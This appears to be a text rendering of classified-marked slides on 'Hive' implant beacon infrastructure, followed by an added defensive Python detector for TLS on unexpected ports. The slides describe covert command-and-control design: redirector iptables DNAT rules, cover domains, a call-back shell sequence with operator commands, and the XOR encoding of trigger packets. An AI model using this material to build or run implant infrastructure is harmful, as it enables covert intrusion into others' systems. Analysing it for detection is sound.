SECRET//NOFORN
Hive Beacon Infrastructure (slide 1, network diagram)
Components shown: Implanted Host; VPS server running Apache with mod_proxy and IPTABLES forwarding; Proxy / VPN Server; Cover Server; DNS Server; SSL session from the Implanted Host; Blot 4.0; Honeycomb; log files; one-way transfer into the RIPPER / SNAPPER database; OSN VPN network connections; Linux-based infrastructure.
Hive Beacon Test Infrastructure: VPS Servers, IPTABLES Forwarding (slide 2, network diagram)
Components shown: two Implanted Hosts (cover domains vhost1.edb.devlan.net and vhost2.edb.devlan.net); VPS servers with IPTABLES forwarding; Blot; VPN tunnels; Cover Server; Beastbox; Honeycomb; Tool Handler; Command Post. Hosts are attached through tap interfaces on bridges br0, br1 and br2; numbered callouts 1 to 6 appear on the diagram.
Cover Server Address Mapping: 172.16.64.11: vhost1; 172.16.64.12: vhost2; ...
VPS Proxy Port Redirection Map:
  Inbound 80  -> Redirected 8001
  Inbound 443 -> Redirected 44301
Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding (slide 3, network diagram)
Components shown: two Implanted Hosts (target domains vhost1.edb.devlan.net and vhost2.edb.devlan.net) on tap interfaces and bridges br1 and br2; Blot; VPN tunnels; Cover Server; Beastbox; Honeycomb; Tool Handler; numbered callouts 1 to 5.
Cover Server Ports: 172.16.64.11: vhost1; 172.16.64.12: vhost2; ...
Blot In-bound Ports: 8001: vhost1; 44301: vhost1; 8002: vhost2; 44302: vhost2; ...
Slide 4 repeats slide 3 unchanged (Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding).
TOP SECRET//SI//NOFORN
Hive Beacon Operational Infrastructure: VPS Servers (slide 5, network diagram)
Components shown: two Implanted Hosts; two VPS servers with IPTABLES forwarding, each fronting a target domain (playa-del-rio.com and viva-rio-engracado.com); Cover Server; VPN tunnels; Blot; Beastbox; Honeycomb; Tool Handler. OS versions labelled on the diagram: CentOS-5.6 32-bit and CentOS-5.8 64-bit.
Slide 6 repeats slide 5 unchanged (Hive Beacon Operational Infrastructure: VPS Servers).
SinnerTwin Deployment Environment (slide 7, title only)
Hive Operation: hived (slide 8, sequence diagram)
Participants: hclient / cutthroat on the GENESIS ICON workstation; hived on the Implanted Host.
Sequence shown: hived waits on its listening port (TriggerListen, fork_process, with the parent and child marked P and C); the workstation sends a Trigger; hived runs start_triggered_connect and opens an SSL session back to the workstation (TriggerCallbackSession); the client side runs StartClientSession and launchShell; the call-back shell is open.
Operator session shown:
  $ ./cutthroat ./hive
  > ilm connect
  > shell open
  shell
Raw TCP/UDP Trigger (slide 9, packet layout diagrams)

Hive 2.5 algorithm: 400-byte packet. Field labels in the diagram (byte ruler marks 0, 8 and 92): 8-bytes Random Data; CRC; Random Data; Random Data of length CRC % 200; CRC; 12-byte Integer PAD (N x 127); 25-byte PAD; 1-byte XOR byte value PAD; Encoded 12-byte Trigger; Random Data.
The twelve-byte trigger is encoded by XORing the 1-byte XOR value with the first five bytes of the trigger; the remaining trigger bytes are XORed with 0xB6.

Hive 2.6 algorithm: 126 bytes minimum / 472 bytes maximum. Field labels in the diagram (byte ruler marks 0, 8 and 92): 8-bytes Random Data; CRC; Random Data; Random Data of length CRC % 200; CRC; Integer 8-byte (N x 127) PAD1; Encoded 8-byte / 12-byte Trigger, PAD2; Random Data of length CRC % 146.
The twelve-byte trigger is encoded by computing an offset of CRC % 72 into the CRC random data field and XORing each of the twelve following bytes with the corresponding byte of the twelve-byte trigger payload.
Scrap slides follow (slide 10)
SECRET//SI//NOFORN
Hive Beacon Lab Test Infrastructure: Implanted Hosts (slide 11, network diagram)
Components shown: Implanted Hosts on PowerPC, MIPSBE, x86 and sparc; VPS Servers (Proxy / Director and Response Servers; target domains domainA.com and domainB.com); Blot; VPN tunnels; Beastbox; Honeycomb; Tool Handler; Command Post; Cover Server; bridges hive1 and hive2 on VLAN 65. OS versions labelled on the diagram: CentOS-6.2 64-bit, CentOS-6.3 64-bit and CentOS-5.9 32-bit.
Hive Test Infrastructure: Implanted Hosts (slide 12, network diagram)
Components shown: Implanted Hosts on PowerPC, MIPSBE, x86 and sparc; VPS Servers (Proxy / Director and Response Servers; target domains domainA.com and domainB.com); Blot; Beastbox; VPN tunnels; Honeycomb; Tool Handler; Command Post; Cover Server; bridges hive1 and hive2 on VLAN 65. The VPS and cover-side hosts carry secondary interface aliases (eth1:1, eth1:2) so that one box answers for several addresses. OS versions labelled on the diagram: CentOS-6.2 64-bit, CentOS-6.3 64-bit and CentOS-5.9 32-bit.
New Hive Test Infrastructure: Implanted Hosts (slide 13, network diagram)
Components shown: Implanted Hosts on PowerPC, MIPSBE, sparc and x86 (implant1 and implant2); VPS Servers (Proxy / Director, Response Servers, SSL; target domains domainA.com and domainB.com); Cover Server running an Nginx Proxy; Honeycomb Tool Handler; Command Post with one interface alias per domain (eth1 .100, eth1:1 .101 for domainA.com, eth1:2 .102 for domainB.com); bridges hive1 and hive2 on VLAN 65. OS versions labelled on the diagram: CentOS-6.2 64-bit, CentOS-6.3 64-bit and CentOS-6.4 64-bit.

Policy routing script shown on the slide (one routing table per implant source address, so each implant's traffic can be steered independently):

#!/bin/bash
# Script to configure policy routing
# Register two named routing tables (ids 101 and 102), one per implant.
echo -e "101\thiveA" >> /etc/iproute2/rt_tables
echo -e "102\thiveB" >> /etc/iproute2/rt_tables
# Each table gets its own default route (both via 172.16.63.2 on this slide).
ip route add default via 172.16.63.2 table hiveA
ip route add default via 172.16.63.2 table hiveB
# Select the table by source address: implant1 -> hiveA, implant2 -> hiveB.
ip rule add from 172.16.63.111 table hiveA prio 1
ip rule add from 172.16.63.112 table hiveB prio 1
Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding (slide 14, network diagram)
Components shown: two Implanted Hosts (target domains vhost1.edb.devlan.net and vhost2.edb.devlan.net); VPS Server with public interface eth0 (10.3.2.174) and tunnel-side interface p3p2; Blot Proxy (172.16.63.101) with VPN Server and Apache Server; Cover Server; Honeycomb; Tool Handler.

VPS Server IPTABLES Configuration

# Default policies: nothing passes unless a rule below accepts it.
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
# Management SSH to the VPS itself.
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT
# DNAT: inbound TCP 53, 80 and 443 on the public address are all rewritten
# to the Blot listener on 172.16.63.101:443.
iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443
iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443
iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443
# FORWARDING: replies in both directions, plus new connections towards Blot.
# Note that DNAT has already rewritten the destination port to 443 by the time
# FORWARD is evaluated, so the --dport 443 rule is the one that matches; the
# 53 and 80 rules are kept as on the slide. Forwarding also needs
# net.ipv4.ip_forward=1, which the slide does not show.
iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT
iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT
iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT
# SNAT: forwarded traffic leaves p3p2 with the VPS's own tunnel-side address.
iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
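Added example, not from the slides or from the Hive project: the DNAT rules above rewrite inbound TCP/53 and TCP/80 to the same TLS listener as TCP/443, so from the network side the observable a defender can look for is a TLS ClientHello on a port where TLS is not expected. The flow records and payload bytes are constructed for this demonstration; 10.3.2.174 is the VPS address on the slide.

```python
# Added example (not from the Hive slides): the slide-14 DNAT rules rewrite
# inbound TCP/53 and TCP/80 to the same TLS listener as TCP/443, so from the
# network side the tell-tale is a TLS ClientHello on a port where TLS is not
# expected. Flow records below are constructed; 10.3.2.174 is the slide's VPS.
import struct

# Ports the slide's PREROUTING rules send to 172.16.63.101:443.
REDIRECTED_PORTS = {53, 80, 443}
TLS_EXPECTED_PORTS = {443}


def looks_like_tls_client_hello(payload: bytes) -> bool:
    """True if payload opens with a TLS Handshake record (0x16, version 3.x)
    whose first handshake message is a ClientHello (type 0x01)."""
    if len(payload) < 6:
        return False
    content_type, major, minor = payload[0], payload[1], payload[2]
    record_len = struct.unpack("!H", payload[3:5])[0]
    return (content_type == 0x16 and major == 0x03 and minor <= 0x04
            and record_len >= 4 and payload[5] == 0x01)


def suspicious_flows(flows):
    """flows: iterable of (src, dst, dst_port, first_payload_bytes).
    Returns (src, dst, dst_port) for each flow carrying a TLS ClientHello
    on a redirected port where TLS is not the expected protocol."""
    hits = []
    for src, dst, dport, payload in flows:
        if (dport in REDIRECTED_PORTS and dport not in TLS_EXPECTED_PORTS
                and looks_like_tls_client_hello(payload)):
            hits.append((src, dst, dport))
    return hits


# Constructed first-payload samples: a truncated TLS 1.2 ClientHello record
# header, a DNS-over-TCP query prefix, and a plain HTTP request line.
CLIENT_HELLO = bytes.fromhex("160301002a01000026030300")
DNS_QUERY = bytes.fromhex("0023abcd01000001")
HTTP_GET = b"GET / HTTP/1.1\r\nHost: vhost1.edb.devlan.net\r\n\r\n"
SAMPLE_FLOWS = [
    ("192.0.2.10", "10.3.2.174", 53, CLIENT_HELLO),   # TLS on the DNS port
    ("192.0.2.11", "10.3.2.174", 53, DNS_QUERY),      # ordinary TCP DNS
    ("192.0.2.12", "10.3.2.174", 80, HTTP_GET),       # ordinary HTTP
    ("192.0.2.13", "10.3.2.174", 80, CLIENT_HELLO),   # TLS on the HTTP port
    ("192.0.2.14", "10.3.2.174", 443, CLIENT_HELLO),  # TLS where expected
]

if __name__ == "__main__":
    for hit in suspicious_flows(SAMPLE_FLOWS):
        print("TLS ClientHello on a non-TLS port:", hit)
```

On real traffic the same check runs over the first client-to-server segment of each flow, and a hit on 53 or 80 is worth correlating with the 443 service on the same host.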
Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding (slide 15, network diagram)
Components shown: two Implanted Hosts (target domains vhost1.edb.devlan.net and vhost2.edb.devlan.net) on tap interfaces and bridges br1 and br2; Blot Proxy with VPN Server and Apache Server; Cover Server; Honeycomb; Tool Handler. The VPS Server IPTABLES Configuration printed on this slide is the same text as on slide 14.
Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding (slide 16, network diagram)
Components shown: two Implanted Hosts (target domains vhost1.edb.devlan.net and vhost2.edb.devlan.net) on tap interfaces and bridges br1 and br2; Blot Proxy with VPN Server and Apache Server; Cover Server; Honeycomb; Tool Handler.
Cover Server Ports: 172.16.64.11: vhost1; 172.16.64.12: vhost2; ...
Blot In-bound Ports: 8001: vhost1; 44301: vhost1; 8002: vhost2; 44302: vhost2; ...